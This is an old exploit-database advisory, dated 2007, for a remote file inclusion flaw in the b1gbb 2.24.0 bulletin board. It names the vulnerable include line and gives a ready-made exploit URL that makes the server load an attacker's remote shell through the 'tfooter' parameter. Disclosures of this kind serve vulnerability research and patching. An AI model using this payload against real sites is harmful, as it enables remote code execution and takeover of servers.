b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability
# Published : 2007-06-25
# Author : Rf7awy
# Previous Title : elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability
# Next Title : BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy
x59@hotmail.it

thanks
Mahmood_ali

# Homepage:
     http://www.Tryag.Com/cc

# Sp.Thanx To :
     Tryag-Team

# www.Syue.com [2007-06-25]